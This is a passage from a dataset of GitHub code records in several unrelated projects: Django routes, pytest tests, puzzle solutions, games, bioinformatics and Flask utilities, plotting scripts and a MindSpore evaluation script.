name='add-wishlist'),\n path('wishlist/', AdsInUserWishListView.as_view(), name='user-wishlist'),\n path('ads-details//', AdsInUserWishListDetailView.as_view(), name='ads-detail')\n\n]\n# urlpatterns += router.urls\n","repo_name":"Kylych-dev/izde_kg","sub_path":"app/oauth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19417024604","text":"import pytest\n\n\n@pytest.mark.parametrize(\n \"rgb1,rgb2,output\",\n [\n ((0, 0, 0), (0, 0, 0), 0),\n ((0, 0, 0), (0, 0, 1), 0.6322079321995702),\n ((10, 20, 30), (110, 120, 130), 43.07089640618708),\n ],\n)\ndef test_color_diff(rgb1, rgb2, output):\n from jcvi.utils.webcolors import color_diff\n\n assert color_diff(rgb1, rgb2) == pytest.approx(output)\n\n\n@pytest.mark.parametrize(\n \"input,output\",\n [((171, 222, 230), \"powderblue\"), ((254, 225, 232), \"lavenderblush\")],\n)\ndef test_closest_color(input, output):\n from jcvi.utils.webcolors import closest_color\n\n assert closest_color(input) == output\n","repo_name":"tanghaibao/jcvi","sub_path":"tests/utils/test_webcolors.py","file_name":"test_webcolors.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":634,"dataset":"github-code","pt":"78"} +{"seq_id":"10811329868","text":"def calculateFishPop(days, population):\n for day in range(int(days)):\n temp = population.copy()\n population[8] = temp[0]\n population[7] = temp[8]\n population[6] = temp[7] + temp[0]\n population[5] = temp[6]\n population[4] = temp[5]\n population[3] = temp[4]\n population[2] = temp[3]\n population[1] = temp[2]\n population[0] = temp[1]\n\n totalPopulation = 0\n for pop in population:\n totalPopulation += pop \n return totalPopulation \n\ndef createStartPop(input):\n population = [0 for x in range(9)]\n\n for fish in input[0].split(','):\n population[int(fish)] += 1\n return population\n\ninput = open( \"/Users/dennisgauss/Documents/Coding/AdventOfCode2021/input_ex6.txt\" ,\"r\").read().split('\\n')\nprint( calculateFishPop(256,createStartPop(input)) )","repo_name":"chanohara/AdventOfCode2021","sub_path":"exercise6.py","file_name":"exercise6.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33571707698","text":"import json\nimport os\nimport re\n\n\ndef get_data(file_path):\n text = []\n _id = os.path.splitext(os.path.basename(file_path))[0]\n print(_id)\n with open(file_path, 'r', encoding='utf8') as fp:\n for line in fp:\n line = re.sub(r'[\\uf070\\uf0d8\\uf0fc]', '', line)\n line = line.strip()\n if line:\n text.append(line)\n data = {'id': _id, 'text': '|'.join(text)}\n print(data)\n return data\n\n\ndef save_data(file_path, data):\n with open(file_path, 'a', encoding='utf8') as fp:\n fp.write(json.dumps(data, ensure_ascii=False) + '\\n')\n\n\ndef main():\n file_list = os.listdir('./data/input/')\n for file in file_list:\n file_path = os.path.join('./data/input/', file)\n data = get_data(file_path)\n save_data(r'D:\\work\\文档解析\\data\\output\\test_data.txt', data)\n\n\nif __name__ == '__main__':\n main()\n # data = get_data('D:\\work\\文档解析\\data\\input\\知识图谱构建方法研究.txt')\n # save_data(r'D:\\work\\文档解析\\data\\output\\test_data.txt', data)\n\n\n\n\n\n\n\n\n\n","repo_name":"ReigenDing/doc_extract","sub_path":"make_data.py","file_name":"make_data.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20536968515","text":"import random\r\n\r\n\r\nclass juegoAhorcado:\r\n ESTADOS = [\r\n r\"\"\"\r\n +--+\r\n | |\r\n |\r\n |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n | |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n /| |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n /|\\ |\r\n |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n /|\\ |\r\n / |\r\n |\r\n =====\"\"\",\r\n r\"\"\"\r\n +--+\r\n | |\r\n O |\r\n /|\\ |\r\n / \\ |\r\n |\r\n =====\"\"\"]\r\n\r\n SALVADO = [\r\n r\"\"\"\r\n +--+\r\n |\r\n |\r\n \\O/ |\r\n | |\r\n / \\ |\r\n =====\"\"\"]\r\n\r\n Categoria = 'FRUTAS JUEGOS DEPORTES'.split()\r\n Frutas = 'PERA PLATANO UVA MANZANA MELOCOTON KIWI ALBARICOQUE CEREZA CIRUELA FRESA GRANADA HIGO LIMA LIMON MANDARINA NARANJA MELON MORA NISPERO PIÑA POMELO SANDIA '.split()\r\n Juegos = 'LOL MINECRAFT FORNITE ISAAC POKEMON BLASPHEMOUS'.split()\r\n Deportes = 'NATACION FUTBOL TENIS BALONMANO BALONCESTO SOCORRISMO'.split()\r\n\r\n\r\n def jugar(self):\r\n\r\n letrasIncorrectas = []\r\n letrasCorrectas = []\r\n categoria = random.choice(self.Categoria)\r\n if categoria == \"FRUTAS\":\r\n secreto = random.choice(self.Frutas)\r\n elif categoria == \"JUEGOS\":\r\n secreto = random.choice(self.Juegos)\r\n else:\r\n secreto = random.choice(self.Deportes)\r\n\r\n while True:\r\n self.dibujar(letrasIncorrectas, letrasCorrectas, secreto, categoria)\r\n\r\n letraDicha = self.dimeLetra(letrasIncorrectas + letrasCorrectas)\r\n\r\n if letraDicha == \"TERMINAR\":\r\n print(self.ESTADOS[6])\r\n print(\"La palabra era \", secreto)\r\n break\r\n\r\n if letraDicha in secreto:\r\n\r\n letrasCorrectas.append(letraDicha)\r\n\r\n salvado = True\r\n for solucion in secreto:\r\n if solucion not in letrasCorrectas:\r\n salvado = False\r\n break\r\n if salvado:\r\n print(self.SALVADO[0])\r\n print('¡Bien hecho! la palabra secreta es :', secreto)\r\n print('Has ganado!')\r\n break\r\n else:\r\n letrasIncorrectas.append(letraDicha)\r\n\r\n if len(letrasIncorrectas) == len(self.ESTADOS) - 1:\r\n self.dibujar(letrasIncorrectas, letrasCorrectas, secreto)\r\n print('Demasiados intentos!')\r\n print('La palabra era \"{}\"'.format(secreto))\r\n break\r\n\r\n def dibujar(self, letrasIncorrectas, letrasCorrectas, secreto, categoria):\r\n print(self.ESTADOS[len(letrasIncorrectas)])\r\n print('La categoría es: ', categoria)\r\n print()\r\n\r\n print('Letras incorrectas: ', end='')\r\n for letra in letrasIncorrectas:\r\n print(letra, end=' ')\r\n if len(letrasIncorrectas) == 0:\r\n print('No hay letras incorrectas.')\r\n if len(letrasIncorrectas) == len(letrasIncorrectas) + 1:\r\n print('Letras diferentes.')\r\n if len(letrasIncorrectas) == len(letrasIncorrectas) + 2:\r\n print('No coinciden.')\r\n\r\n print()\r\n\r\n longitudPalabra = ['_'] * len(secreto)\r\n\r\n for i in range(len(secreto)):\r\n if secreto[i] in letrasCorrectas:\r\n longitudPalabra[i] = secreto[i]\r\n\r\n print(' '.join(longitudPalabra))\r\n\r\n def dimeLetra(self, letraDicha):\r\n while True:\r\n print('Adivina una letra.')\r\n adivina = input('> ').upper()\r\n if adivina == \"TERMINAR\":\r\n return adivina\r\n elif len(adivina) != 1:\r\n print('Introduce una única letra.')\r\n elif adivina in letraDicha:\r\n print('Esa letra letraDicha la sabías. Elige otra vez.')\r\n elif not adivina.isalpha():\r\n print('Introduce una LETRA.')\r\n\r\n else:\r\n return adivina\r\n\r\n\r\nif __name__ == '__main__':\r\n juego1 = juegoAhorcado()\r\n juego1.jugar()\r\n","repo_name":"Sevigamer/ahorcado","sub_path":"ahorcado.py","file_name":"ahorcado.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26446277124","text":"import asyncio\nimport time\nimport pandas as pd\n\nimport uvloop\nfrom universalis.common.stateflow_ingress import IngressTypes\nfrom universalis.universalis import Universalis\n\nimport ycsb\nfrom graph import ycsb_operator, g\n\n\nUNIVERSALIS_HOST: str = 'localhost'\nUNIVERSALIS_PORT: int = 8886\nKAFKA_URL = 'localhost:9093'\n\nkeys = list(range(1000))\n\n\nasync def main():\n universalis = Universalis(UNIVERSALIS_HOST, UNIVERSALIS_PORT,\n ingress_type=IngressTypes.KAFKA,\n kafka_url=KAFKA_URL)\n ####################################################################################################################\n # SUBMIT STATEFLOW GRAPH ###########################################################################################\n ####################################################################################################################\n await universalis.submit(g)\n\n print('Graph submitted')\n\n timestamped_request_ids = {}\n\n time.sleep(1)\n\n # Debug\n tasks = []\n for i in keys:\n tasks.append(universalis.send_kafka_event(operator=ycsb_operator,\n key=i,\n function=ycsb.Debug,\n params=(i, )))\n responses = await asyncio.gather(*tasks)\n for request_id, timestamp in responses:\n timestamped_request_ids[request_id] = timestamp\n\n await universalis.close()\n\n pd.DataFrame(timestamped_request_ids.items(), columns=['request_id', 'timestamp']).to_csv(\n '../demo/client_requests.csv',\n index=False)\n\nif __name__ == \"__main__\":\n uvloop.install()\n asyncio.run(main())\n","repo_name":"delftdata/stateflow-runtime","sub_path":"demo-ycsb/read_own_writes_demo.py","file_name":"read_own_writes_demo.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42504541344","text":"import pandas as pd\n\nfrom bioinf_workflows.utils import tools as ts\n\nBED_FILE = [\n \"chr\",\n \"start\",\n \"end\",\n \"id\",\n \"mapq\",\n \"strand\",\n \"cigar\"\n]\n\nBED_FILE_ANNO = [\n \"chr\",\n \"start\",\n \"end\",\n \"id\",\n \"mapq\",\n \"strand\",\n \"cigar\",\n \"ens_chr\",\n \"ens_start\",\n \"ens_end\",\n \"ens_annotation\",\n \"ens_strand\",\n \"ens_ensid\",\n \"ens_gsymbol\",\n \"ens_transid\",\n \"ens_num\"\n]\n\n\ndef remove2bpinsertions(insamfile,\n sam_out):\n \"\"\"\n Remove insertions that are one or two base pairs away from each other.\n :param insamfile: input SAM file\n :param sam_out: file object to write content\n :return: file object to write content (???)\n \"\"\"\n\n sam_file = ts.load_file(insamfile)\n\n for index in range(len(sam_file)):\n if index == 0:\n sam_out.writelines('\\t'.join(sam_file[index-1]))\n sam_out.writelines(\"\\n\")\n continue\n\n # samfile chromosome position is column 4\n position = int(sam_file[index-1][3])\n next_read = sam_file[index]\n next_position = int(next_read[3])\n bp_distance = abs(next_position-position)\n\n if not (bp_distance <= 2):\n sam_out.writelines('\\t'.join(sam_file[index]))\n sam_out.writelines(\"\\n\")\n\n return sam_out\n\n\ndef fix_end_position(inbedfile,\n outbedfile):\n \"\"\"\n Add 1 base pair to end position in BED formatted file\n :param inbedfile: input BED file\n :param outbedfile: output BED file\n :return: None\n \"\"\"\n\n df = pd.read_csv(inbedfile, sep=\"\\t\",\n names=BED_FILE)\n df['end'] = df['start']+1\n df.to_csv(outbedfile, sep=\"\\t\", index=0, header=0)\n\n return None\n\n\n\n\n","repo_name":"sp00nman/bioinf_workflows","sub_path":"bioinf_workflows/bioinf_workflows/utils/process_files.py","file_name":"process_files.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"2175698187","text":"import json\nimport pickle\nfrom datetime import datetime\n\nfrom flask import current_app\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom app.dist_task.src.dist_system.client import Client\nfrom app.mysql import DrawMLRepository\nfrom app.mysql_models import Data, TrainedModel, Experiment\nfrom app.redis import redis_cache, RedisKeyMaker\n\n\nclass TaskRunner:\n \"\"\"\n Deprecated\n USE common.object_code.util\n \"\"\"\n def __init__(self, user_id: int, xml,\n data_obj_code, data_input_files, data_key: str,\n model_obj_code, model_input_file, model_key: str):\n self.user_id = user_id\n self.xml = xml\n self.data_obj_code = data_obj_code\n self.data_input_files = data_input_files\n self.data_key = data_key,\n self.model_obj_code = model_obj_code\n self.model_input_file = model_input_file\n self.model_key = model_key\n self.valid = True\n self.entry_arguments = None\n self.config()\n\n def config(self):\n check_data = (self.data_obj_code is not None and self.data_input_files is not None)\n check_model = (self.model_obj_code is not None and self.model_input_file is not None)\n if not check_data and not check_model:\n self.valid = False\n return\n\n if check_model:\n # Gonna be changed to 'model_input_file'\n input_path = 'app/common/object_code/test/linear_regression_input.txt'\n\n def get_dummy_input(input_path: str):\n with open(input_path, 'r', encoding='utf-8') as f:\n return f.read()\n\n tensorflow_train_task_job_dict = dict()\n tensorflow_train_task_job_dict['data_file_token'] = get_dummy_input(input_path)\n tensorflow_train_task_job_dict['object_code'] = self.model_obj_code\n\n self.entry_arguments = dict(\n experiment_id=self.model_key,\n task_type=Client.TaskType.TYPE_TENSORFLOW_TRAIN_TASK,\n task_job_dict=tensorflow_train_task_job_dict,\n callback=self.create_callback(self.model_key, self.entry_arguments)\n )\n\n if check_data:\n data_processing_task_job_dict = dict()\n data_processing_task_job_dict['data_file_num'] = len(self.data_input_files)\n data_processing_task_job_dict['data_file_token_list'] = self.data_input_files\n data_processing_task_job_dict['object_code'] = self.data_obj_code\n\n self.entry_arguments = dict(\n experiment_id=self.model_key,\n task_type=Client.TaskType.TYPE_DATA_PROCESSING_TASK,\n task_job_dict=data_processing_task_job_dict,\n callback=self.create_callback(str(self.data_key), self.entry_arguments)\n )\n return\n\n def create_callback(self, task_key: str, task_args: dict):\n \"\"\"\n # # Callback parameter\n # \n # - [\"success\", \"error\", \"cancel\"]: str\n # \n # - dict when \"success\",\n # { \"stdout\", \"stderr\", \"result_file_token\", \"session_file_token\" }\n # - str when \"error\"\n # - None when \"cancel\"\n \"\"\"\n key = task_key\n db = DrawMLRepository().db\n if task_args is not None:\n next_arguments = task_args\n\n def _callback(status: str, body=None):\n print('[run_experiment] ', 'callbacked! ')\n\n if status == 'success':\n task_type = key.split('-')[1]\n if task_type == str(RedisKeyMaker.DATA_PROCESSING):\n exp_id = key.split('-')[0]\n current_time = datetime.now().isoformat()\n file_name = exp_id + 'exp-data-' + current_time\n file_token = body.get('result_file_token', None)\n new_data = Data(name=file_name, user_id=self.user_id, path=file_token, type='log')\n try:\n db.session.add(new_data)\n db.session.commit()\n except SQLAlchemyError as e:\n db.session.rollback()\n redis_cache.set(key, redis_cache.FAIL)\n current_app.logger.error(e)\n return\n # update file token\n next_arguments['data_file_token'] = file_token\n current_app.logger.info('data created :' + str(new_data))\n elif task_type == str(RedisKeyMaker.MODEL_TRAINING):\n exp_id = key.split('-')[0]\n current_time = datetime.now().isoformat()\n file_name = exp_id + 'exp-train-' + current_time\n file_token = body.get('session_file_token', None)\n new_model = TrainedModel(name=file_name, user_id=self.user_id,\n path=file_token, xml=pickle.dumps(self.xml))\n try:\n db.session.add(new_model)\n db.session.commit()\n except SQLAlchemyError as e:\n db.session.rollback()\n redis_cache.set(key, redis_cache.FAIL)\n current_app.logger.error(e)\n return\n current_time = datetime.now().isoformat()\n file_name = exp_id + 'exp-train-result-' + current_time\n file_token = body.get('result_file_token', None)\n new_data = Data(name=file_name, user_id=self.user_id, path=file_token, type='log')\n try:\n db.session.add(new_data)\n db.session.commit()\n except SQLAlchemyError as e:\n db.session.rollback()\n redis_cache.set(key, redis_cache.FAIL)\n current_app.logger.error(e)\n return\n redis_cache.set(key, redis_cache.SUCCESS)\n print(\"[%d] callback is called with 'success'\" % key)\n elif status == 'error':\n redis_cache.set(key, redis_cache.FAIL)\n print(\"[%d] callback is called with 'fail'\" % key)\n elif status == 'cancel':\n # Client().request_cancel(key)\n redis_cache.set(key, redis_cache.CANCEL)\n print(\"[%d] callback is called with 'cancel'\" % key)\n\n if body is not None:\n print(body['stderr'])\n\n if next_arguments:\n redis_cache.set(next_arguments['experiment_id'], redis_cache.RUNNING)\n Client().request_task(**next_arguments)\n\n return _callback\n\n def run(self):\n if self.valid is False:\n return self.valid\n redis_cache.set(self.entry_arguments['experiment_id'], redis_cache.RUNNING)\n Client().request_task(**self.entry_arguments)\n return self.valid\n\n\nclass Refiner(json.JSONEncoder):\n def __init__(self, exps):\n super().__init__()\n if type(exps) is not list:\n self.exps = self.exp_to_dict(exps)\n else:\n self.exps = []\n for exp in exps:\n temp = self.exp_to_dict(exp)\n self.exps.append(temp)\n\n def exp_to_dict(self, exp):\n exp_dict = dict(\n id=exp.id,\n date_modified=str(exp.date_modified),\n date_created=str(exp.date_created),\n user_id=exp.user_id,\n name=exp.name,\n xml=pickle.loads(exp.xml),\n drawing=pickle.loads(exp.drawing)\n )\n return exp_dict\n\n\nclass JsonParser:\n @staticmethod\n def parse_post(json, user_id):\n try:\n exp_json = json['exp_data']\n exp_data = Experiment(exp_json['name'],\n user_id,\n pickle.dumps(exp_json['xml']),\n pickle.dumps(exp_json['drawing']))\n except KeyError as e:\n return e\n return exp_data","repo_name":"DrawML/was-flask","sub_path":"app/experiment/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"70140749052","text":"import matplotlib.pyplot as plt\nimport torch, sys\nimport argparse\nimport numpy as np\n\n\ndef visualize_clf(checkpoint):\n t_losses = checkpoint['t_loss']\n t_accuracies = checkpoint['t_acc']\n v_losses = checkpoint['v_loss']\n v_accuracies = checkpoint['v_acc']\n\n fig, ((ax1,ax2),(ax3,ax4)) = plt.subplots(nrows=2, ncols=2)\n ax1.title.set_text(\"Training loss per Iter\")\n ax1.plot(t_losses)\n ax2.title.set_text(\"Training accuracy per Epoch\")\n ax2.plot(t_accuracies)\n ax3.title.set_text(\"Validation loss per Epoch\")\n ax3.plot(v_losses)\n ax4.title.set_text(\"Validation Accuracy per Epoch\")\n ax4.plot(v_accuracies)\n\n fig.subplots_adjust(hspace=1.0)\n\ndef visualize_gan(checkpoint):\n dis_losses = checkpoint['dis_loss']\n gen_losses = checkpoint['gen_loss']\n\n adv_losses = [gen_loss['adversarial_loss'] for gen_loss in gen_losses]\n hinge_losses = [gen_loss['hinge_loss'] for gen_loss in gen_losses]\n fooling_losses = [gen_loss['fooling_loss'] for gen_loss in gen_losses]\n\n num_iters = len(adv_losses)\n\n x = np.linspace(0, num_iters, num_iters)\n plt.plot(x, dis_losses, label=\"Discriminator Loss\")\n plt.plot(x, adv_losses, label=\"Adversarial Loss\")\n plt.plot(x, fooling_losses, label=\"Fooling Loss\")\n plt.plot(x, hinge_losses, label=\"Pertubation Regularization Loss\")\n\n plt.legend()\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--gan\", action=\"store_true\")\n parser.add_argument(\"-p\", \"--checkpoint-path\", type=str)\n args = parser.parse_args()\n chkpt_path = args.checkpoint_path\n checkpoint = torch.load(chkpt_path, map_location=torch.device('cpu'))\n\n if args.gan:\n visualize_gan(checkpoint)\n else:\n visualize_clf(checkpoint)\n \n plt.show()","repo_name":"Axquaris/cs182project","sub_path":"visualize_training.py","file_name":"visualize_training.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17658555466","text":"def solution(seq, k):\n l = len(seq)\n total = [0] * (l + 1)\n answer = []\n p2 = 0\n for i in range(1, l + 1):\n total[i] = total[i - 1] + seq[i - 1]\n for p1 in range(l + 1):\n end = l\n while p2 < end and total[p2] - total[p1] < k:\n p2 += 1\n if p2 <= end and total[p2] - total[p1] == k:\n answer.append((p2 - p1, [p1, p2 - 1]))\n answer.sort(key = lambda x: x[0])\n return answer[0][1]","repo_name":"mhd329/programmers","sub_path":"연속된부분수열의합/0.py","file_name":"0.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"75232963451","text":"# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n ORCA Open Remote Control Application\r\n Copyright (C) 2013-2020 Carsten Thielepape\r\n Please contact me by : http://www.orca-remote.org/\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n\"\"\"\r\nimport ORCA.Globals as Globals\r\nfrom ORCA.utils.FileName import cFileName\r\nfrom ORCA.utils.Path import cPath\r\nfrom ORCA.vars.Access import SetVar\r\n\r\n__all__ = ['cDefinitionPathes']\r\n\r\nclass cDefinitionPathes:\r\n \"\"\" Class , which is a representation of all pathes of a definition \"\"\"\r\n def __init__(self, *,uDefinitionName:str, uDefinitionPathName:str=u\"\") -> None:\r\n uAdd:str\r\n self.oPathDefinition:cPath\r\n self.oPathDefinitionSkinElements:cPath\r\n oPathCheck:cPath\r\n uCheck:str\r\n\r\n if Globals.uDeviceOrientation == 'landscape':\r\n uAdd = 'l'\r\n else:\r\n uAdd = 'p'\r\n if Globals.fScreenSize<5.1:\r\n uAdd += 's'\r\n else:\r\n uAdd += 'l'\r\n\r\n if uDefinitionPathName==u\"\":\r\n self.oPathDefinition = Globals.oPathDefinitionRoot + uDefinitionName\r\n else:\r\n self.oPathDefinition = Globals.oPathDefinitionRoot + uDefinitionPathName\r\n\r\n self.oPathDefinitionAtlas:cPath = self.oPathDefinition + 'atlas'\r\n self.oFnDefinitionAtlas:cFileName = cFileName(self.oPathDefinitionAtlas) + u'definition.atlas'\r\n self.oFnDefinitionLocalFont:cFileName = cFileName(self.oPathDefinition + u'fonts') + 'fonts.xml'\r\n self.oFnDefinition:cFileName = cFileName(self.oPathDefinition) + u'definition.xml'\r\n self.oFnDefinitionCache:cFileName = cFileName(self.oPathDefinition) + (u'cache_' + uAdd + '.xml')\r\n self.oFnDefinitionIni:cFileName = cFileName(self.oPathDefinition) + u'definition.ini'\r\n self.oPathDefinitionInterfaceSettings:cPath = self.oPathDefinition + u'interfacesettings'\r\n self.oPathDefinitionScriptSettings:cPath = self.oPathDefinition + u'scriptsettings'\r\n self.oFnDefinitionLanguage:cFileName = cFileName()\r\n self.oFnDefinitionLanguageFallBack:cFileName = cFileName(self.oPathDefinition + u'languages/English')+ \"strings.xml\"\r\n self.oPathDefinitionSkinElements:cPath = self.oPathDefinition + u'elements'\r\n self.oPathTemplateSkinElements:cFileName = cFileName()\r\n\r\n uCheck = \"skin_\" + Globals.uSkinName\r\n oPathCheck = self.oPathDefinitionSkinElements + uCheck\r\n if oPathCheck.Exists():\r\n self.oPathDefinitionSkinElements = oPathCheck\r\n SetVar(\"SKINCONTEXT\",uCheck)\r\n else:\r\n self.oPathDefinitionSkinElements = self.oPathDefinitionSkinElements + \"skin_default\"\r\n SetVar(\"SKINCONTEXT\", \"skin_default\")\r\n\r\n self.LanguageChange()\r\n\r\n if uDefinitionName in Globals.oDefinitions:\r\n if \"definition_templatename_mediaplayer_wizard\" in Globals.oDefinitions[uDefinitionName].oDefinitionVars:\r\n oPathCheck = Globals.oPathWizardTemplates +(Globals.oDefinitions[uDefinitionName].oDefinitionVars[\"definition_templatename_mediaplayer_wizard\"]+\"/elements/\" +uCheck)\r\n if oPathCheck.Exists():\r\n self.oPathTemplateSkinElements = oPathCheck\r\n SetVar(\"MEDIATEMPLATESKINCONTEXT\",uCheck)\r\n else:\r\n self.oPathDefinitionSkinElements = Globals.oPathWizardTemplates +(Globals.oDefinitions[uDefinitionName].oDefinitionVars[\"definition_templatename_mediaplayer_wizard\"]+\"/elements/\" + \"skin_default\")\r\n SetVar(\"MEDIATEMPLATESKINCONTEXT\", \"skin_default\")\r\n\r\n def LanguageChange(self) -> None:\r\n \"\"\"\r\n changes the filename of the definition language file\r\n :return:\r\n \"\"\"\r\n self.oFnDefinitionLanguage = cFileName(self.oPathDefinition + (u'languages/' + Globals.uLanguage)) + u'strings.xml'\r\n return None","repo_name":"thica/ORCA-Remote","sub_path":"src/ORCA/definition/DefinitionPathes.py","file_name":"DefinitionPathes.py","file_ext":"py","file_size_in_byte":4650,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"78"} +{"seq_id":"30306037071","text":"\ndef quick(A):\n\tif len(A) == 0:\n\t\treturn []\n\tpivot = A.pop(0)\n\tL, R = [], []\n\tfor e in A:\n\t\tif e <= pivot:\n\t\t\tL.append(e)\n\t\telse:\n\t\t\tR.append(e)\n\treturn quick(L) + [pivot] + quick(R)\n\nprint(quick([3, 7, 4, 1]))","repo_name":"krxwer4/DS","sub_path":"quick.py","file_name":"quick.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71319139453","text":"from collections import deque\n\n\ndef solution(A, B):\n answer = 0\n A.sort()\n B.sort()\n A = deque(A)\n B = deque(B)\n while B:\n if A[0] < B[0]:\n answer += 1\n A.popleft()\n B.popleft()\n else:\n B.popleft()\n return answer","repo_name":"LimSB-dev/BaekjoonHub","sub_path":"프로그래머스/lv3/12987. 숫자 게임/숫자 게임.py","file_name":"숫자 게임.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"33065366374","text":"answer_A = [\"A\", \"a\"]\nanswer_B = [\"B\", \"b\"]\nanswer_C = [\"C\", \"c\"]\nyes = [\"Y\", \"y\", \"yes\"]\nno = [\"N\", \"n\", \"no\"]\n\nsword = False\n\ndef intro():\n print(\"After a drunken night out with friends, you awaken in a thick, dank forest. A slobbering orc is running towards you.\")\n\n print(\"A. Grab a nearby rock and throw it at the orc\")\n print(\"B. Lie down and wait to be mauled\")\n print(\"C. Run\")\n\n choice = str(input())\n\n if choice in answer_A:\n option_rock()\n elif choice in answer_B:\n print(\"Welp, that was quick. You died!\")\n elif choice in answer_C:\n option_run()\n\ndef option_rock():\n print(\"The orc is stunned, but regains control. He begins running towards you again.\")\n\n print(\"A. Run\")\n print(\"B. Throw another rock\")\n print(\"C. Run towards a nearby cave\")\n\n choice = str(input())\n if choice in answer_A:\n option_run()\n elif choice in answer_B:\n print(\"The rock flew well over the orcs head. You missed. You died!\")\n elif choice in answer_C:\n option_cave()\n\ndef option_cave():\n print(\"Before you fully enter, you notice a shiny sword on the ground. Do you pick up a sword. Y/N?\")\n\n choice = str(input())\n if choice in yes:\n sword = True\n elif choice in no:\n sword = False\n\n print(\"What do you do next?\")\n\n print(\"A. Hide in silence\")\n print(\"B. Fight\")\n print(\"C. Run\")\n\n choice = str(input())\n if choice in answer_A:\n print(\"I think orcs can see very well in the dark, right? You died!\")\n elif choice in answer_B:\n if sword == False:\n print(\"You're defenseless. You died!\")\n elif sword == True:\n print(\"As the orc reached out to grab the sword, you pierced the blade into its chest. You survived!\")\n elif choice in answer_C:\n print(\"The orc turns around and sees you running.\")\n option_run()\n\ndef option_run():\n print(\"You run as quickly as possible.\")\n\n print(\"A. Hide behind boulder\")\n print(\"B. Trapped, so you fight\")\n print(\"C. Run towards an abandoned town\")\n\n choice = str(input())\n\n if choice in answer_A:\n print(\"You're easily spotted. You died!\")\n elif choice in answer_B:\n print(\"You're no match for an orc. You died!\")\n elif choice in answer_C:\n option_town()\n\ndef option_town():\n print(\"You notice a purple flower near your foot. Do you pick it up? Y/N\")\n\n choice = str(input())\n\n if choice in yes:\n print(\"You quickly hold out the purple flower. The orc was looking for love. This got weird, but you survived!\")\n elif choice in no:\n print(\"Maybe you should have picked up the flower. You died!\")\n\nintro()\n","repo_name":"NIAEFEUP/slides","sub_path":"python-workshop/text_based_game.py","file_name":"text_based_game.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"12806935965","text":"import mindspore\r\nfrom mindspore import ops\r\n\r\nfrom evaluation.evaluation import top_k_accuracy\r\nfrom model.posec3d.recognizer3d import Recognizer3d\r\nfrom dataset import FLAG2DPoseC3DValDatasetGenerator\r\nimport mindspore.dataset as ds\r\n\r\n\r\ndef val(dataset_val, model):\r\n i = 0 # iteration num\r\n total_acc_top1 = 0.\r\n total_acc_top5 = 0.\r\n\r\n model.set_train(False)\r\n for data in dataset_val.create_dict_iterator():\r\n x = data[\"keypoint\"]\r\n label = data[\"label\"].to(mindspore.int32)\r\n y = model(x)\r\n batch_acc = top_k_accuracy(y.numpy(), label.numpy(), (1,5))\r\n print(label,ops.argmax(y,axis=1))\r\n\r\n total_acc_top1 += batch_acc[0]\r\n total_acc_top5 += batch_acc[1]\r\n\r\n i += 1\r\n\r\n\r\n accuracy_top1 = total_acc_top1 / i\r\n accuracy_top5 = total_acc_top5 / i\r\n print(\"accuracy_top1: \", accuracy_top1 ,\"accuracy_top5: \", accuracy_top5)\r\n\r\ndataset_val_generator = FLAG2DPoseC3DValDatasetGenerator(\"D:/data/flag2d.pkl\", 500)\r\ndataset_val = ds.GeneratorDataset(dataset_val_generator, [\"keypoint\", \"label\"], shuffle=True).batch(\r\n 1, True)\r\nprint(\"dataset success\")\r\n\r\nmodel = Recognizer3d(\r\n depth=50,\r\n pretrained=None,\r\n in_channels=17,\r\n base_channels=32,\r\n num_stages=3,\r\n out_indices=(2,),\r\n stage_blocks=(4, 6, 3),\r\n 